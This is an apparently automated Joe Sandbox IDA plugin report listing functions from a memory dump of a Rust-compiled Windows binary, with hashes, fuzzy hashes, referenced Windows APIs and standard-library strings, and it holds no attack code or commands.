Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: 2$2
API String ID: 0-3784399050
Opcode ID: c9ff9ae3ff6a2fe64a4c15407332d654a052168682713aca6000e7b424874b26
Instruction ID: d8f7c6967a4ae4e0e52afdd114a044e5ff6e99cbbbee3dc29e3e140eb72d5587
Opcode Fuzzy Hash: c9ff9ae3ff6a2fe64a4c15407332d654a052168682713aca6000e7b424874b26
Instruction Fuzzy Hash: B023A2B2A186958BD3688F24C64063C7BB1FF85B49F25C239CB5A87B59DF38D801DB50

Function 00007FF63D276EE0 Relevance: 4.6, APIs: 3, Instructions: 76filenativesynchronizationCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL ref: 00007FF63D276F51
WaitForSingleObject.KERNEL32 ref: 00007FF63D276F65
RtlNtStatusToDosError.NTDLL ref: 00007FF63D276F8F

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorFileObjectReadSingleStatusWait
String ID:
API String ID: 3583596364-0
Opcode ID: 4eed91d9a39560526d7a8d9eec06e0ee47547f55f7c86c8f1b09b9148c06fbaa
Instruction ID: 517b4944cd845de112f768b86457b5d2d08c75f1fdc2d04a45e9598d54e21c59
Opcode Fuzzy Hash: 4eed91d9a39560526d7a8d9eec06e0ee47547f55f7c86c8f1b09b9148c06fbaa
Instruction Fuzzy Hash: 4131CC32F04B9999FB60CBB0E8407AD33A0AB94758F508130FA4E83B99EF3CD5919340

Function 00007FF63D23D1D0 Relevance: 4.4, APIs: 3, Instructions: 679COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D23DC64

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 93119471c1f6efe8fbfbf97ed26e9b2a80bd43b04e852abf22b216e192d1ffd0
Instruction ID: 908f160b778198beccbaa6b82c0151a80d4e962974fc4e131f87de703e420042
Opcode Fuzzy Hash: 93119471c1f6efe8fbfbf97ed26e9b2a80bd43b04e852abf22b216e192d1ffd0
Instruction Fuzzy Hash: 3952B252E08BC883E7118F6996012E86760FB697D8F46A721DF6D53796EF38E2D5C300

Function 00007FF63D23DC80 Relevance: 4.4, APIs: 3, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c829463470470f7b4964831b1ac1f0c3118e2d0008bfd1ec6e7c66954680678c
Instruction ID: 394949613353aba5c8a1f54e0d8bfa37b86df86bd3cb961f50667c0f5670b6d2
Opcode Fuzzy Hash: c829463470470f7b4964831b1ac1f0c3118e2d0008bfd1ec6e7c66954680678c
Instruction Fuzzy Hash: 5E62D363A14BC886EB118F68DA002E97760FB687D8F459721DF6D533A5EF38E295C300

Function 00007FF63D2C3350 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

INFINITY, xrefs: 00007FF63D2C33C7
<, xrefs: 00007FF63D2C3642
NAN, xrefs: 00007FF63D2C3488

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: <$INFINITY$NAN
API String ID: 0-2314501456
Opcode ID: 25cdb153779fdb788de3b14be86f6e6bfe9936a62491776514dcf1e098ff83ad
Instruction ID: abb5c118e961a20aae2795b4e692a837cde276f00eec1fe3257e224cf773f0d9
Opcode Fuzzy Hash: 25cdb153779fdb788de3b14be86f6e6bfe9936a62491776514dcf1e098ff83ad
Instruction Fuzzy Hash: 91D1E3B2F0868E44FB618BB58A84BB8A761AF41794F544931DB1DD73D1FE3CED85A200

Function 00007FF63D24B800 Relevance: 3.1, APIs: 1, Instructions: 1894COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70dc1c02b5097ec0f2f7ae725ff55147b625c185937b75409fc0230ca7587782
Instruction ID: 6c9268c1711e015984f8e39d247874c6053312d725f7a650246451f135b68bef
Opcode Fuzzy Hash: 70dc1c02b5097ec0f2f7ae725ff55147b625c185937b75409fc0230ca7587782
Instruction Fuzzy Hash: 85139172A08BD589E7718F69D9403E937A4FB04798F005235EF5D8BB99EF389685E300

Function 00007FF63D2C1780 Relevance: 3.1, Strings: 2, Instructions: 557COMMON

Download Yara Rule

Strings

assertion failed: digits < 3, xrefs: 00007FF63D2C210E
assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_, xrefs: 00007FF63D2C1EC7, 00007FF63D2C2A7A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: assertion failed: digits < 3$assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
API String ID: 0-2607668560
Opcode ID: 98b3385c3d579fad76b66177bc2c53a2ba71a8cce4d1cbd7e4d5b219d9e7a95d
Instruction ID: 5b705d74f0fa8325382d8bf107c0a3351fad5206f583068edb549ab5f9e6971d
Opcode Fuzzy Hash: 98b3385c3d579fad76b66177bc2c53a2ba71a8cce4d1cbd7e4d5b219d9e7a95d
Instruction Fuzzy Hash: 65222823F0868989FB228BA4D5113F82BA0FB55714F484235DB9E83BC1EE7CD995D710

Function 00007FF63D277D80 Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007FF63D277DBC
WSAGetLastError.WS2_32 ref: 00007FF63D277DC5

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLastRecv
String ID:
API String ID: 904507345-0
Opcode ID: ceecb4f797f5478758c6416cdaaa455461adc79c2b9b3924914c8c752924edad
Instruction ID: 02f78d7367e62dc45039a063e5f0c52bb5914bf6aa0d4d35f4b9f7a41acf9e66
Opcode Fuzzy Hash: ceecb4f797f5478758c6416cdaaa455461adc79c2b9b3924914c8c752924edad
Instruction Fuzzy Hash: F1F0A472F04A4599F720D7B1D5013BD22A0AB98354F648231EB5C97789FF29DAD19600

Function 00007FF63D23B350 Relevance: 2.9, APIs: 2, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de9433cb98f94a430e6aaf40341db30cdcb2d7d06c1631c28e4995252198cf9
Instruction ID: 9c9c61331eadbcf7db48813686bd9a4673fb830b3fb92add222c79b590cfa7d6
Opcode Fuzzy Hash: 5de9433cb98f94a430e6aaf40341db30cdcb2d7d06c1631c28e4995252198cf9
Instruction Fuzzy Hash: DF02CD62B18A8985EB31CF65D9583ED2760F754B98F404632EF1D8B7A8EF39D285D300

Function 00007FF63D23BA80 Relevance: 2.9, APIs: 2, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d0c3accc6ac4c58f77e314b3ae2c2632e14838a64a6af3b66b43d06663d990
Instruction ID: abdd8a32c1b3f178683b70d3339ae7f018efddf782b28603903d363d423b931a
Opcode Fuzzy Hash: 48d0c3accc6ac4c58f77e314b3ae2c2632e14838a64a6af3b66b43d06663d990
Instruction Fuzzy Hash: E2F1A362B08AC986EB318E65DD483E92361F754BD8F015632EF1D8B795EE38D681E300

Function 00007FF63D2B9750 Relevance: 2.9, Strings: 2, Instructions: 362COMMON

Download Yara Rule

Strings

-+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 00007FF63D2B980A, 00007FF63D2B9C8E
e0E0assertion failed: buf.len() >= ndigits || buf.len() >= maxlen, xrefs: 00007FF63D2B9A52

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$e0E0assertion failed: buf.len() >= ndigits || buf.len() >= maxlen
API String ID: 0-3864725730
Opcode ID: 547a5d9ec5138697606fc12009170360ae8bddcb2323316c68655c41b2df0fc9
Instruction ID: 437eecbc335237eb71d5e84c2a7c0aff88221d748185e9deec6a967bf1c7bbb9
Opcode Fuzzy Hash: 547a5d9ec5138697606fc12009170360ae8bddcb2323316c68655c41b2df0fc9
Instruction Fuzzy Hash: CBF1E3A2A08A8989F7728F61D9403E823A5FB05348F545135DF4D9BBD8EFBCD645E340

Function 00007FF63D2C9BC0 Relevance: 2.8, Strings: 2, Instructions: 288COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF63D2C9CE3, 00007FF63D2C9F64, 00007FF63D2C9F97, 00007FF63D2C9FB3
-+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 00007FF63D2C9DBB

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
API String ID: 0-1873708790
Opcode ID: b47bf52a956a6c958f1587c6764a72f770f8ed38a988b0e8f0d788a256c7815f
Instruction ID: d7f8f15fb3516356099eb90427fa6faca779c7dc5a975e0819d9ca99e564997a
Opcode Fuzzy Hash: b47bf52a956a6c958f1587c6764a72f770f8ed38a988b0e8f0d788a256c7815f
Instruction Fuzzy Hash: 08A167A2F286594AEB04CB66DA143B82792FB45BC5F449531DE1EC7794EE7CED06C300

Function 00007FF63D26DD00 Relevance: 2.8, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

overflow when subtracting duration from instant, xrefs: 00007FF63D26DFF3, 00007FF63D26E0A0
overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00007FF63D26DE9F, 00007FF63D26DF51

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: overflow when adding duration to instantlibrary\std\src\time.rs$overflow when subtracting duration from instant
API String ID: 0-3373325108
Opcode ID: 0565f850d5a905c63ce04a5ade45597cded546ea6001bd2c79164f9e7debcf4c
Instruction ID: 57fcd46b9ce88ff205b21c06c24a04bb3b782d980f031e1a1f86d8b8b5d746ea
Opcode Fuzzy Hash: 0565f850d5a905c63ce04a5ade45597cded546ea6001bd2c79164f9e7debcf4c
Instruction Fuzzy Hash: F4B1F362F24B5E89FB04CBB4E9443BC7366AB54358F54D231DA1EA6BD4FE7CA1858300

Function 00007FF63D231665 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

3333, xrefs: 00007FF63D231904
UUUU, xrefs: 00007FF63D23169F

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: 3333$UUUU
API String ID: 0-2679824526
Opcode ID: 0b221bbdeef47010658f7fc4f1bdbca6138b9f93817a83bd168641643622ae09
Instruction ID: b19e8b402ba85773eed0469ab6b4c421392702ca4e6ec000f40a62f9be27af7f
Opcode Fuzzy Hash: 0b221bbdeef47010658f7fc4f1bdbca6138b9f93817a83bd168641643622ae09
Instruction Fuzzy Hash: A8B1F572A1CB8982E7268F84E5503FAB3A1FB84785F444235EB8A47794EF3CE559D700

Function 00007FF63D26FF10 Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D26FF15
0123456789abcdef, xrefs: 00007FF63D2700ED

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: 0123456789abcdef$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards
API String ID: 0-2027556079
Opcode ID: f125fa777c9b713af963a93f8e5d16da6fa5998d30dfe893d3f77d8afa9f9e5c
Instruction ID: 27ce2f67c7ade9414283a8af2d76a760cc8f5bb2e683e4415857b0bfa6b29c87
Opcode Fuzzy Hash: f125fa777c9b713af963a93f8e5d16da6fa5998d30dfe893d3f77d8afa9f9e5c
Instruction Fuzzy Hash: 4D61AA53E086E568F7188EB44A202BD2E70A716358F044139DFABB73D6EE7CD416E310

Function 00007FF63D253DD0 Relevance: 2.4, APIs: 1, Instructions: 1116COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D253E69

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a38de8fa35f84c855b802005e72921fa9324596461d73d6f15d7b7e2412866e1
Instruction ID: f11cbab32cabfadbf026550abc94480bae6091f509b7e86e9c44f23b3492da3b
Opcode Fuzzy Hash: a38de8fa35f84c855b802005e72921fa9324596461d73d6f15d7b7e2412866e1
Instruction Fuzzy Hash: A8B29D32A08BC589EB718FA5D944BEDA7A2FB04788F444135DB5D8BB88EF39D645D300

Function 00007FF63D22FF83 Relevance: 2.2, Strings: 1, Instructions: 994COMMON

Download Yara Rule

Strings

assertion failed: lookahead_size >= len_to_move, xrefs: 00007FF63D23107F

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: assertion failed: lookahead_size >= len_to_move
API String ID: 0-1193057213
Opcode ID: f0c0ae32f07f374757cf32290c73185b533844ff279fabdaf0c837a95eb7c6d5
Instruction ID: 147de97c54426423d8f8b447dbf9af6e3bbfd4e5381ce5dedc2389e9b0f55b07
Opcode Fuzzy Hash: f0c0ae32f07f374757cf32290c73185b533844ff279fabdaf0c837a95eb7c6d5
Instruction Fuzzy Hash: 67A2D272A18A8986E765CF65D6403A9B7A0FB48B80F004136EFDD87795EF7CE4A0D710

Function 00007FF63D2CADE0 Relevance: 1.9, Strings: 1, Instructions: 628COMMON

Download Yara Rule

Strings

0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF63D2CAE55

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: 0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
API String ID: 0-1744301434
Opcode ID: 36052ce367510e7e9e3149ff4b1c96de7990bb98a338042ed2551ff82bb53209
Instruction ID: 7b1c42310fa4a8c8803f762e12644ad4bcfaf977087199f852878d35e5658bd4
Opcode Fuzzy Hash: 36052ce367510e7e9e3149ff4b1c96de7990bb98a338042ed2551ff82bb53209
Instruction Fuzzy Hash: 7C52F023D086D88ED7268FB981502BC3FB1F71A758F144225EB9A43B98DF39D846E710

Function 00007FF63D2934B6 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

internal error: entered unreachable code/rust/deps\memchr-2.5.0\src\memmem\x86\avx.rs, xrefs: 00007FF63D2934B6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
